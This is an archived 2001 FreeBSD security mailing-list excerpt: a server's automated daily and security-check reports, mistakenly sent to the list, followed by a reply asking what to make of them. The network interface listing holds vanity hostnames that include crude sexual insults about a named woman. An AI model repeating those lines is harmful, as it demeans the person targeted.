(CET) From: root@unloved.org (Charlie Root) Removing stale files from /var/preserve: Cleaning out old system announcements: Removing stale files from /var/rwho: Backup passwd and group files: kyra.unloved.org passwd diffs: 68d67 < orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash 69a69 > postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent kyra.unloved.org group diffs: 93a94 > postfix:*:3024: Verifying group file syntax: Backing up mail aliases: kyra.unloved.org aliases diffs: --- /var/backups/aliases.bak Thu Sep 21 17:28:04 2000 +++ /etc/mail/aliases Mon Jan 22 11:02:55 2001 @@ -1,4 +1,4 @@ -# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $ +# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $ # @(#)aliases 5.3 (Berkeley) 5/24/90 # # Aliases in this file will NOT be expanded in the header from @@ -24,8 +24,10 @@ # General redirections for pseudo accounts bin: root +bind: root daemon: root games: root +kmem: root man: root news: root nobody: root @@ -33,6 +35,7 @@ pop: root system: root toor: root +tty: root usenet: news uucp: root xten: root Disk status: Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad5s1a 198399 51629 130899 28% / /dev/ad5s2e 9505261 539884 8204957 6% /data /dev/ad5s1f 8473272 2924146 4871265 38% /usr /dev/ad5s1e 992239 18696 894164 2% /var procfs 4 4 0 100% /proc Last dump(s) done (Dump '>' file systems): UUCP status: Network interface status: Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll xl0 1500 00:10:4b:09:ec:f0 49045770 0 84287087 4 0 xl0 1500 62.58.62.160/ kyra 49045770 0 84287087 4 0 xl0 1500 jacquie.would jacquie.would.b 49045770 0 84287087 4 0 xl0 1500 my.pussy.gets my.pussy.gets.w 49045770 0 84287087 4 0 xl0 1500 jacquie.loves jacquie.loves.a 49045770 0 84287087 4 0 xl0 1500 twilight.bast twilight.bastar 49045770 0 84287087 4 0 xl0 1500 freebsd.is.be freebsd.is.bett 49045770 0 84287087 4 0 xl0 1500 magic.kablast magic.kablasto. 49045770 0 84287087 4 0 xl0 1500 i.own.decix.n i.own.decix.net 49045770 0 84287087 4 0 xl0 1500 teefers.is.th teefers.is.thra 49045770 0 84287087 4 0 xl0 1500 i.fucked.freu i.fucked.freudi 49045770 0 84287087 4 0 xl0 1500 jacquie.swall jacquie.swallow 49045770 0 84287087 4 0 xl0 1500 unhappy.and/3 unhappy.and 49045770 0 84287087 4 0 xl0 1500 attyz.wants.t attyz.wants.to. 49045770 0 84287087 4 0 xl0 1500 jacquie.is.a. jacquie.is.a.cu 49045770 0 84287087 4 0 xl0 1500 i.am.not.real i.am.not.really 49045770 0 84287087 4 0 xl0 1500 you.need.a.go you.need.a.good 49045770 0 84287087 4 0 xl0 1500 will.never.be will.never.be 49045770 0 84287087 4 0 xl0 1500 vanitywhore.o vanitywhore.org 49045770 0 84287087 4 0 xl0 1500 is.a.masturba is.a.masturbati 49045770 0 84287087 4 0 xl0 1500 works.for.ver works.for.versa 49045770 0 84287087 4 0 xl0 1500 deeply.shallo deeply.shallow. 49045770 0 84287087 4 0 xl0 1500 62.58.48.84/3 62.58.48.84 49045770 0 84287087 4 0 lo0 16384 5114 0 5114 0 0 lo0 16384 127 localhost 5114 0 5114 0 0 Local system status: 3:01AM up 15:55, 1 user, load averages: 0.00, 0.00, 0.00 Mail in local queue: Mail queue is empty Security check: (output mailed separately) --13586F431.980215574/kyra.unloved.org-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 18: 8:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id 5D1C937B404; Mon, 22 Jan 2001 18:06:17 -0800 (PST) Received: by kyra.unloved.org (Postfix) id 71C2CF432; Tue, 23 Jan 2001 03:06:16 +0100 (CET) Delivered-To: ashp@unloved.org Received: by kyra.unloved.org (Postfix) via BOUNCE id 24DA6F40E; Tue, 23 Jan 2001 03:06:16 +0100 (CET) Date: Tue, 23 Jan 2001 03:06:16 +0100 (CET) From: MAILER-DAEMON@unloved.org (Mail Delivery System) Subject: Undelivered Mail Returned to Sender To: root@unloved.org MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="162E6F432.980215576/kyra.unloved.org" Message-Id: <20010123020616.24DA6F40E@kyra.unloved.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a MIME-encapsulated message. --162E6F432.980215576/kyra.unloved.org Content-Description: Notification Content-Type: text/plain This is the Postfix program at host kyra.unloved.org. I'm sorry to have to inform you that the message returned below could not be delivered to one or more destinations. For further assistance, please send mail to If you do so, please include this problem report. You can delete your own text from the message returned below. The Postfix program <$header_Cc@unloved.org>: unknown user: "$header_cc" <$header_sender@unloved.org>: unknown user: "$header_sender" <$home/Mail/lists/bugtraq@unloved.org>: unknown user: "$home/mail/lists/bugtraq" <$home/Mail/lists/freebsd-arch@unloved.org>: unknown user: "$home/mail/lists/freebsd-arch" <$home/Mail/lists/freebsd-current@unloved.org>: unknown user: "$home/mail/lists/freebsd-current" <$home/Mail/lists/freebsd-security@unloved.org>: unknown user: "$home/mail/lists/freebsd-security" <$home/Mail/lists/freeciv@unloved.org>: unknown user: "$home/mail/lists/freeciv" <^freeciv-dev@unloved.org>: unknown user: "^freeciv-dev" : unknown user: "contains" : unknown user: "endif" : unknown user: "if" : unknown user: "matches" : unknown user: "or" : unknown user: "save" : unknown user: "then" <$header_To@unloved.org>: unknown user: "$header_to" <$header_X-list@unloved.org>: unknown user: "$header_x-list" <$home/Mail/lists/freebsd-cvs@unloved.org>: unknown user: "$home/mail/lists/freebsd-cvs" --162E6F432.980215576/kyra.unloved.org Content-Description: Delivery error report Content-Type: message/delivery-status Reporting-MTA: dns; kyra.unloved.org Arrival-Date: Tue, 23 Jan 2001 03:06:08 +0100 (CET) Final-Recipient: rfc822; $header_Cc@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_cc" Final-Recipient: rfc822; $header_sender@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_sender" Final-Recipient: rfc822; $home/Mail/lists/bugtraq@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/bugtraq" Final-Recipient: rfc822; $home/Mail/lists/freebsd-arch@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-arch" Final-Recipient: rfc822; $home/Mail/lists/freebsd-current@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-current" Final-Recipient: rfc822; $home/Mail/lists/freebsd-security@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-security" Final-Recipient: rfc822; $home/Mail/lists/freeciv@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freeciv" Final-Recipient: rfc822; ^freeciv-dev@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "^freeciv-dev" Final-Recipient: rfc822; contains@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "contains" Final-Recipient: rfc822; endif@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "endif" Final-Recipient: rfc822; if@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "if" Final-Recipient: rfc822; matches@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "matches" Final-Recipient: rfc822; or@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "or" Final-Recipient: rfc822; save@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "save" Final-Recipient: rfc822; then@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "then" Final-Recipient: rfc822; $header_To@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_to" Final-Recipient: rfc822; $header_X-list@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$header_x-list" Final-Recipient: rfc822; $home/Mail/lists/freebsd-cvs@unloved.org Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; unknown user: "$home/mail/lists/freebsd-cvs" --162E6F432.980215576/kyra.unloved.org Content-Description: Undelivered Message Content-Type: message/rfc822 Received: by kyra.unloved.org (Postfix) id 162E6F432; Tue, 23 Jan 2001 03:06:08 +0100 (CET) Delivered-To: ashp@unloved.org Received: by kyra.unloved.org (Postfix, from userid 0) id 1CCE2F40C; Tue, 23 Jan 2001 03:06:07 +0100 (CET) Subject: kyra.unloved.org security check output Message-Id: <20010123020607.1CCE2F40C@kyra.unloved.org> Date: Tue, 23 Jan 2001 03:06:07 +0100 (CET) From: root@unloved.org (Charlie Root) To: undisclosed-recipients: ; Checking setuid files and devices: kyra.unloved.org setuid diffs: 1,54c1,52 < 21616 -r-xr-sr-x 1 root operator 56964 Oct 29 23:03:40 2000 /bin/df < 21532 -r-sr-xr-x 1 root wheel 241844 Oct 29 23:03:44 2000 /bin/rcp < 35919 -r-xr-sr-x 1 root kmem 62800 Oct 29 23:06:25 2000 /sbin/ccdconfig < 35863 -r-xr-sr-x 1 root kmem 69488 Oct 29 23:06:27 2000 /sbin/dmesg < 36290 -r-xr-sr-x 2 root tty 257044 Oct 29 23:06:27 2000 /sbin/dump < 35898 -r-sr-xr-x 1 root wheel 195636 Oct 29 23:06:42 2000 /sbin/ping < 35899 -r-sr-xr-x 1 root bin 190864 Oct 29 23:06:43 2000 /sbin/ping6 < 36290 -r-xr-sr-x 2 root tty 257044 Oct 29 23:06:27 2000 /sbin/rdump < 36041 -r-xr-sr-x 2 root tty 283376 Oct 29 23:06:44 2000 /sbin/restore < 35901 -r-sr-xr-x 1 root wheel 191712 Oct 29 23:06:44 2000 /sbin/route < 36041 -r-xr-sr-x 2 root tty 283376 Oct 29 23:06:44 2000 /sbin/rrestore < 35906 -r-sr-x--- 1 root operator 164524 Oct 29 23:06:46 2000 /sbin/shutdown < 8500 -r-sr-xr-x 4 root wheel 19324 Oct 29 23:07:48 2000 /usr/bin/at < 8500 -r-sr-xr-x 4 root wheel 19324 Oct 29 23:07:48 2000 /usr/bin/atq < 8500 -r-sr-xr-x 4 root wheel 19324 Oct 29 23:07:48 2000 /usr/bin/atrm < 8500 -r-sr-xr-x 4 root wheel 19324 Oct 29 23:07:48 2000 /usr/bin/batch < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/chfn < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/chpass < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/chsh < 8235 -r-sr-xr-x 1 root wheel 23912 Oct 29 23:08:54 2000 /usr/bin/crontab < 8490 -r-sr-sr-x 1 uucp dialer 123456 Oct 29 23:04:16 2000 /usr/bin/cu < 8071 -r-xr-sr-x 1 root kmem 12900 Oct 29 23:08:00 2000 /usr/bin/fstat < 8087 -r-xr-sr-x 1 root kmem 9624 Oct 29 23:08:03 2000 /usr/bin/ipcs < 8026 -r-sr-xr-x 1 root wheel 510 Oct 29 23:08:04 2000 /usr/bin/keyinfo < 8094 -r-sr-xr-x 1 root wheel 7232 Oct 29 23:08:04 2000 /usr/bin/keyinit < 8110 -r-sr-xr-x 1 root wheel 6792 Oct 29 23:08:11 2000 /usr/bin/lock < 8113 -r-sr-xr-x 1 root wheel 19556 Oct 29 23:08:11 2000 /usr/bin/login < 8239 -r-sr-sr-x 1 root daemon 19796 Oct 29 23:09:35 2000 /usr/bin/lpq < 8240 -r-sr-sr-x 1 root daemon 22996 Oct 29 23:09:35 2000 /usr/bin/lpr < 8241 -r-sr-sr-x 1 root daemon 19132 Oct 29 23:09:36 2000 /usr/bin/lprm < 7984 -r-sr-xr-x 1 man wheel 28304 Oct 29 23:04:54 2000 /usr/bin/man < 8136 -r-xr-sr-x 1 root kmem 84736 Oct 29 23:08:16 2000 /usr/bin/netstat < 8138 -r-xr-sr-x 1 root kmem 9660 Oct 29 23:08:16 2000 /usr/bin/nfsstat < 8462 -r-sr-xr-x 2 root wheel 26356 Oct 29 23:08:18 2000 /usr/bin/passwd < 8148 -r-sr-xr-x 1 root wheel 10232 Oct 29 23:08:19 2000 /usr/bin/quota < 8152 -r-sr-xr-x 1 root wheel 9976 Oct 29 23:08:20 2000 /usr/bin/rlogin < 8156 -r-sr-xr-x 1 root wheel 7372 Oct 29 23:08:22 2000 /usr/bin/rsh < 8467 -r-sr-xr-x 2 root wheel 147872 Oct 29 23:10:00 2000 /usr/bin/slogin < 8467 -r-sr-xr-x 2 root wheel 147872 Oct 29 23:10:00 2000 /usr/bin/ssh < 8168 -r-sr-xr-x 1 root wheel 7960 Oct 29 23:08:24 2000 /usr/bin/su < 8171 -r-xr-sr-x 1 root kmem 56648 Oct 29 23:08:25 2000 /usr/bin/systat < 8179 -r-xr-sr-x 1 root kmem 32104 Oct 29 23:08:27 2000 /usr/bin/top < 8489 -r-sr-xr-x 1 uucp wheel 87984 Oct 29 23:04:18 2000 /usr/bin/uucp < 8350 -r-sr-xr-x 1 uucp wheel 37100 Oct 29 23:04:18 2000 /usr/bin/uuname < 8279 -r-sr-sr-x 1 uucp dialer 96540 Oct 29 23:04:19 2000 /usr/bin/uustat < 8274 -r-sr-xr-x 1 uucp wheel 88600 Oct 29 23:04:19 2000 /usr/bin/uux < 8200 -r-xr-sr-x 1 root kmem 16392 Oct 29 23:08:35 2000 /usr/bin/vmstat < 8201 -r-xr-sr-x 1 root tty 8860 Oct 29 23:08:35 2000 /usr/bin/wall < 8208 -r-xr-sr-x 1 root tty 7288 Oct 29 23:08:37 2000 /usr/bin/write < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/ypchfn < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/ypchpass < 8317 -r-sr-xr-x 6 root wheel 31972 Oct 29 23:07:52 2000 /usr/bin/ypchsh < 8462 -r-sr-xr-x 2 root wheel 26356 Oct 29 23:08:18 2000 /usr/bin/yppasswd < 1190465 -r-xr-sr-x 1 root games 6964 Oct 29 23:03:54 2000 /usr/games/dm --- > 21620 -r-xr-sr-x 1 root operator 56892 Jan 22 09:47:23 2001 /bin/df > 21532 -r-sr-xr-x 1 root wheel 241840 Jan 22 09:47:30 2001 /bin/rcp > 35924 -r-xr-sr-x 1 root kmem 62792 Jan 22 09:52:51 2001 /sbin/ccdconfig > 35863 -r-xr-sr-x 1 root kmem 69544 Jan 22 09:52:55 2001 /sbin/dmesg > 36344 -r-xr-sr-x 2 root tty 257100 Jan 22 09:52:56 2001 /sbin/dump > 35898 -r-sr-xr-x 1 root wheel 195660 Jan 22 09:53:19 2001 /sbin/ping > 35899 -r-sr-xr-x 1 root bin 190888 Jan 22 09:53:20 2001 /sbin/ping6 > 36344 -r-xr-sr-x 2 root tty 257100 Jan 22 09:52:56 2001 /sbin/rdump > 36159 -r-xr-sr-x 2 root tty 283372 Jan 22 09:53:22 2001 /sbin/restore > 35901 -r-sr-xr-x 1 root wheel 191736 Jan 22 09:53:23 2001 /sbin/route > 36159 -r-xr-sr-x 2 root tty 283372 Jan 22 09:53:22 2001 /sbin/rrestore > 35906 -r-sr-x--- 1 root operator 164484 Jan 22 09:53:26 2001 /sbin/shutdown > 8383 -r-sr-xr-x 4 root wheel 19540 Jan 22 09:56:32 2001 /usr/bin/at > 8383 -r-sr-xr-x 4 root wheel 19540 Jan 22 09:56:32 2001 /usr/bin/atq > 8383 -r-sr-xr-x 4 root wheel 19540 Jan 22 09:56:32 2001 /usr/bin/atrm > 8383 -r-sr-xr-x 4 root wheel 19540 Jan 22 09:56:32 2001 /usr/bin/batch > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/chfn > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/chpass > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/chsh > 8235 -r-sr-xr-x 1 root wheel 24508 Jan 22 09:58:53 2001 /usr/bin/crontab > 8334 -r-sr-sr-x 1 uucp dialer 123856 Jan 22 09:48:31 2001 /usr/bin/cu > 8071 -r-xr-sr-x 1 root kmem 13108 Jan 22 09:56:58 2001 /usr/bin/fstat > 8087 -r-xr-sr-x 1 root kmem 9832 Jan 22 09:57:07 2001 /usr/bin/ipcs > 8025 -r-sr-xr-x 1 root wheel 510 Jan 22 09:57:09 2001 /usr/bin/keyinfo > 8094 -r-sr-xr-x 1 root wheel 7444 Jan 22 09:57:09 2001 /usr/bin/keyinit > 8110 -r-sr-xr-x 1 root wheel 7004 Jan 22 09:57:21 2001 /usr/bin/lock > 8113 -r-sr-xr-x 1 root wheel 19764 Jan 22 09:57:22 2001 /usr/bin/login > 8239 -r-sr-sr-x 1 root daemon 22728 Jan 22 10:00:25 2001 /usr/bin/lpq > 8240 -r-sr-sr-x 1 root daemon 26312 Jan 22 10:00:26 2001 /usr/bin/lpr > 8241 -r-sr-sr-x 1 root daemon 21612 Jan 22 10:00:27 2001 /usr/bin/lprm > 7984 -r-sr-xr-x 1 man wheel 27872 Jan 22 09:49:48 2001 /usr/bin/man > 8136 -r-xr-sr-x 1 root kmem 85104 Jan 22 09:57:32 2001 /usr/bin/netstat > 8138 -r-xr-sr-x 1 root kmem 9936 Jan 22 09:57:33 2001 /usr/bin/nfsstat > 8439 -r-sr-xr-x 2 root wheel 26564 Jan 22 09:57:39 2001 /usr/bin/passwd > 8148 -r-sr-xr-x 1 root wheel 10440 Jan 22 09:57:42 2001 /usr/bin/quota > 8152 -r-sr-xr-x 1 root wheel 10216 Jan 22 09:57:44 2001 /usr/bin/rlogin > 8156 -r-sr-xr-x 1 root wheel 7584 Jan 22 09:57:46 2001 /usr/bin/rsh > 8168 -r-sr-xr-x 1 root wheel 8168 Jan 22 09:57:53 2001 /usr/bin/su > 8171 -r-xr-sr-x 1 root kmem 56144 Jan 22 09:57:54 2001 /usr/bin/systat > 8179 -r-xr-sr-x 1 root kmem 32344 Jan 22 09:57:58 2001 /usr/bin/top > 8337 -r-sr-xr-x 1 uucp wheel 88228 Jan 22 09:48:33 2001 /usr/bin/uucp > 8340 -r-sr-xr-x 1 uucp wheel 37312 Jan 22 09:48:34 2001 /usr/bin/uuname > 8292 -r-sr-sr-x 1 uucp dialer 96752 Jan 22 09:48:35 2001 /usr/bin/uustat > 8279 -r-sr-xr-x 1 uucp wheel 88844 Jan 22 09:48:35 2001 /usr/bin/uux > 8200 -r-xr-sr-x 1 root kmem 15952 Jan 22 09:58:16 2001 /usr/bin/vmstat > 8201 -r-xr-sr-x 1 root tty 9072 Jan 22 09:58:17 2001 /usr/bin/wall > 8208 -r-xr-sr-x 1 root tty 7500 Jan 22 09:58:21 2001 /usr/bin/write > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/ypchfn > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/ypchpass > 8384 -r-sr-xr-x 6 root wheel 32184 Jan 22 09:56:43 2001 /usr/bin/ypchsh > 8439 -r-sr-xr-x 2 root wheel 26564 Jan 22 09:57:39 2001 /usr/bin/yppasswd > 1190465 -r-xr-sr-x 1 root games 7176 Jan 22 09:47:43 2001 /usr/games/dm 57,58c55,56 < 1190520 -r-sr-sr-x 1 uucp dialer 220460 Oct 29 23:04:16 2000 /usr/libexec/uucp/uucico < 1190524 -r-sr-s--- 1 uucp uucp 99340 Oct 29 23:04:19 2000 /usr/libexec/uucp/uuxqt --- > 1190520 -r-sr-sr-x 1 uucp dialer 220672 Jan 22 09:48:32 2001 /usr/libexec/uucp/uucico > 1190524 -r-sr-s--- 1 uucp uucp 99584 Jan 22 09:48:36 2001 /usr/libexec/uucp/uuxqt 62,74d59 < 1801974 -r-xr-sr-x 1 bin mail 26080 Oct 19 21:40:14 2000 /usr/local/libexec/cucipop < 1024241 -rwxr-sr-x 1 root mailman 16329 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/admin < 1024242 -rwxr-sr-x 1 root mailman 16333 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/admindb < 1024243 -rwxr-sr-x 1 root mailman 16341 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/archives < 1024244 -rwxr-sr-x 1 root mailman 16341 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/edithtml < 1024249 -rwxr-sr-x 1 root mailman 16349 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/handle_opts < 1024246 -rwxr-sr-x 1 root mailman 16341 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/listinfo < 1024245 -rwxr-sr-x 1 root mailman 16333 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/options < 1024250 -rwxr-sr-x 1 root mailman 16333 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/private < 1024248 -rwxr-sr-x 1 root mailman 16329 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/roster < 1024247 -rwxr-sr-x 1 root mailman 16345 Jan 12 13:45:48 2001 /usr/local/mailman/cgi-bin/subscribe < 1064052 -rwxr-sr-x 1 root mailman 16867 Jan 12 13:45:48 2001 /usr/local/mailman/mail/wrapper < 1627111 -rwsr-xr-x 1 root wheel 543149 Dec 23 15:29:16 2000 /usr/local/sbin/exim 76,89c61,75 < 1214251 -r-xr-sr-x 1 root kmem 4456 Oct 29 23:08:59 2000 /usr/sbin/ifmcstat < 1214253 -r-xr-sr-x 1 root kmem 10116 Oct 29 23:08:59 2000 /usr/sbin/iostat < 1214359 -r-xr-sr-x 1 root daemon 26784 Oct 29 23:09:35 2000 /usr/sbin/lpc < 1214276 -r-sr-xr-x 1 root wheel 16136 Oct 29 23:09:04 2000 /usr/sbin/mrinfo < 1214278 -r-sr-xr-x 1 root wheel 29688 Oct 29 23:09:04 2000 /usr/sbin/mtrace < 1214402 -r-sr-xr-- 1 root network 283964 Oct 29 23:09:15 2000 /usr/sbin/ppp < 1214403 -r-sr-xr-x 1 root wheel 96080 Oct 29 23:09:16 2000 /usr/sbin/pppd < 1214629 -r-xr-sr-x 2 root kmem 14368 Oct 29 23:09:17 2000 /usr/sbin/pstat < 1214327 -r-sr-x--- 1 root network 10776 Oct 29 23:09:23 2000 /usr/sbin/sliplogin < 1214629 -r-xr-sr-x 2 root kmem 14368 Oct 29 23:09:17 2000 /usr/sbin/swapinfo < 1214336 -r-sr-xr-x 1 root wheel 14900 Oct 29 23:09:26 2000 /usr/sbin/timedc < 1214337 -r-sr-xr-x 1 root wheel 12956 Oct 29 23:09:26 2000 /usr/sbin/traceroute < 1214338 -r-sr-xr-x 1 root bin 14744 Oct 29 23:09:27 2000 /usr/sbin/traceroute6 < 1214339 -r-xr-sr-x 1 root kmem 7832 Oct 29 23:09:27 2000 /usr/sbin/trpt --- > 1627116 -r-xr-sr-x 1 root maildrop 56904 Jan 22 14:34:20 2001 /usr/local/sbin/postdrop > 1214251 -r-xr-sr-x 1 root kmem 4664 Jan 22 09:59:01 2001 /usr/sbin/ifmcstat > 1214253 -r-xr-sr-x 1 root kmem 9608 Jan 22 09:59:02 2001 /usr/sbin/iostat > 1214359 -r-xr-sr-x 1 root daemon 29204 Jan 22 10:00:24 2001 /usr/sbin/lpc > 1214276 -r-sr-xr-x 1 root wheel 16348 Jan 22 09:59:12 2001 /usr/sbin/mrinfo > 1214278 -r-sr-xr-x 1 root wheel 29896 Jan 22 09:59:13 2001 /usr/sbin/mtrace > 1214402 -r-sr-xr-- 1 root network 294100 Jan 22 09:59:41 2001 /usr/sbin/ppp > 1214403 -r-sr-xr-x 1 root wheel 95612 Jan 22 09:59:42 2001 /usr/sbin/pppd > 1214640 -r-xr-sr-x 2 root kmem 14616 Jan 22 09:59:44 2001 /usr/sbin/pstat > 1214327 -r-sr-x--- 1 root network 11112 Jan 22 09:59:56 2001 /usr/sbin/sliplogin > 1214640 -r-xr-sr-x 2 root kmem 14616 Jan 22 09:59:44 2001 /usr/sbin/swapinfo > 1214336 -r-sr-xr-x 1 root wheel 15112 Jan 22 10:00:05 2001 /usr/sbin/timedc > 1214337 -r-sr-xr-x 1 root wheel 13168 Jan 22 10:00:06 2001 /usr/sbin/traceroute > 1214338 -r-sr-xr-x 1 root bin 14952 Jan 22 10:00:06 2001 /usr/sbin/traceroute6 > 1214339 -r-xr-sr-x 1 root kmem 8040 Jan 22 10:00:06 2001 /usr/sbin/trpt Checking for uids of 0: root 0 toor 0 Checking for passwordless accounts: kyra.unloved.org kernel log messages: > Copyright (c) 1992-2001 The FreeBSD Project. > FreeBSD 4.2-STABLE #0: Sun Jan 21 19:59:44 CET 2001 > ashp@kyra.unloved.org:/usr/obj/usr/src/sys/KYRA > avail memory = 258371584 (252316K bytes) kyra.unloved.org login failures: kyra.unloved.org refused connections: --162E6F432.980215576/kyra.unloved.org-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 22 19:34:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from hecky.it.northwestern.edu (hecky.acns.nwu.edu [129.105.16.51]) by hub.freebsd.org (Postfix) with ESMTP id 150FC37B401 for ; Mon, 22 Jan 2001 19:34:37 -0800 (PST) Received: (from mailnull@localhost) by hecky.it.northwestern.edu (8.8.7/8.8.7) id VAA07218 for ; Mon, 22 Jan 2001 21:34:35 -0600 (CST) Received: from euphoria.confusion.net (dhcp089069.res-hall.nwu.edu [199.74.89.69]) by hecky.acns.nwu.edu via smap (V2.0) id xma007175; Mon, 22 Jan 01 21:34:11 -0600 Message-ID: <3A6CFB44.7CCD8D88@euphoria.confusion.net> Date: Mon, 22 Jan 2001 21:32:20 -0600 From: Laurence Berland X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: kyra.unloved.org daily run output References: <20010123020607.7E839F40E@kyra.unloved.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What do we make of this? Charlie Root wrote: > > Removing stale files from /var/preserve: > > Cleaning out old system announcements: > > Removing stale files from /var/rwho: > > Backup passwd and group files: > kyra.unloved.org passwd diffs: > 68d67 > < orion:(password):2004:2004::0:0:Orion Server:/home/orion:/usr/local/bin/bash > 69a69 > > postfix:(password):2001:3024::0:0:Postfix Mail System:/nonexistent:/nonexistent > kyra.unloved.org group diffs: > 93a94 > > postfix:*:3024: > > Verifying group file syntax: > > Backing up mail aliases: > kyra.unloved.org aliases diffs: > --- /var/backups/aliases.bak Thu Sep 21 17:28:04 2000 > +++ /etc/mail/aliases Mon Jan 22 11:02:55 2001 > @@ -1,4 +1,4 @@ > -# $FreeBSD: src/etc/mail/aliases,v 1.10.4.1 2000/08/27 17:31:38 gshapiro Exp $ > +# $FreeBSD: src/etc/mail/aliases,v 1.10.4.2 2000/12/16 07:03:35 dougb Exp $ > # @(#)aliases 5.3 (Berkeley) 5/24/90 > # > # Aliases in this file will NOT be expanded in the header from > @@ -24,8 +24,10 @@ > > # General redirections for pseudo accounts > bin: root > +bind: root > daemon: root > games: root > +kmem: root > man: root > news: root > nobody: root > @@ -33,6 +35,7 @@ > pop: root > system: root > toor: root > +tty: root > usenet: news > uucp: root > xten: root > > Disk status: > Filesystem 1K-blocks Used Avail Capacity Mounted on > /dev/ad5s1a 198399 51629 130899 28% / > /dev/ad5s2e 9505261 539884 8204957 6% /data > /dev/ad5s1f 8473272 2924146 4871265 38% /usr > /dev/ad5s1e 992239 18696 894164 2% /var > procfs 4 4 0 100% /proc > > Last dump(s) done (Dump '>' file systems): > > UUCP status: > > Network interface status: > Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll > xl0 1500 00:10:4b:09:ec:f0 49045770 0 84287087 4 0 > xl0 1500 62.58.62.160/ kyra 49045770 0 84287087 4 0 > xl0 1500 jacquie.would jacquie.would.b 49045770 0 84287087 4 0 > xl0 1500 my.pussy.gets my.pussy.gets.w 49045770 0 84287087 4 0 > xl0 1500 jacquie.loves jacquie.loves.a 49045770 0 84287087 4 0 > xl0 1500 twilight.bast twilight.bastar 49045770 0 84287087 4 0 > xl0 1500 freebsd.is.be freebsd.is.bett 49045770 0 84287087 4 0 > xl0 1500 magic.kablast magic.kablasto. 49045770 0 84287087 4 0 > xl0 1500 i.own.decix.n i.own.decix.net 49045770 0 84287087 4 0 > xl0 1500 teefers.is.th teefers.is.thra 49045770 0 84287087 4 0 > xl0 1500 i.fucked.freu i.fucked.freudi 49045770 0 84287087 4 0 > xl0 1500 jacquie.swall jacquie.swallow 49045770 0 84287087 4 0 > xl0 1500 unhappy.and/3 unhappy.and 49045770 0 84287087 4 0 > xl0 1500 attyz.wants.t attyz.wants.to. 49045770 0 84287087 4 0 > xl0 1500 jacquie.is.a. jacquie.is.a.cu 49045770 0 84287087 4 0 > xl0 1500 i.am.not.real i.am.not.really 49045770 0 84287087 4 0 > xl0 1500 you.need.a.go you.need.a.good 49045770 0 84287087 4 0 